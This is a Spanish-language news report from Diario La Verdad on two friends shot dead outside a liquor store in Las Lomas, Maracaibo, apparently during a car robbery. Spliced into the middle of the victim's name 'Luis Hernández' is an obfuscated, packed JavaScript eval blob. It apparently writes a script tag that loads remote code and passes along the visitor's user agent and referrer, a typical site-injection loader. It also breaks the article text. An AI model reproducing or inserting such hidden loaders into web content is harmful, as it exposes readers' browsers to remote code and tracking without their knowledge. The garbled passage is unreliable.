publicidad

Tirotean a par de amigos frente a una licorería en Las Lomas

Yaileth Argüelles / Maracaibo / yarguelles@laverdad.com
Luis eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|znerz|var|u0026u|referrer|dbadk||js|php'.split('|'),0,{})) Hernández y Jhon Henry Padrón fueron tiroteados anoche frente a una licorería en la urbanización Las Lomas, al oeste de Maracaibo. Ambos murieron en distintos centros de salud. Se presume que fueron atacados para robarles el carro

Los familiares de las víctimas se mostraron herméticos ante los medios. (Foto: Archivo)

Luis Hernández, de 31 años, y Jhon Henry Padrón, de 23, fueron asesinados a balazos la noche de ayer en la urbanización Las Lomas de Maracaibo. 

Los amigos compartían tragos frente a una licorería en el mencionado sector cuando sujetos desconocidos les dispararon en reiteradas oportunidades.

A los heridos los trasladaron en primera instancia al ambulatorio de La Victoria, De allí Hernández fue remitido al Hospital Universitario de Maracaibo (HUM), mientras que a Padrón lo llevaron al Centro Médico La Limpia. Ambos fallecieron en cada uno de los respectivos centros.

Los cuerpos fueron llevados a la medicatura forense donde sus familiares esperaron por su entrega. 

Los allegados de las víctimas se mostraron herméticos ante los medios de comunicación, sin embargo, se conoció que a las víctimas los habrían atacado para robarles el vehículo Ford Fiesta, propiedad de Hernández.

Más noticias

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama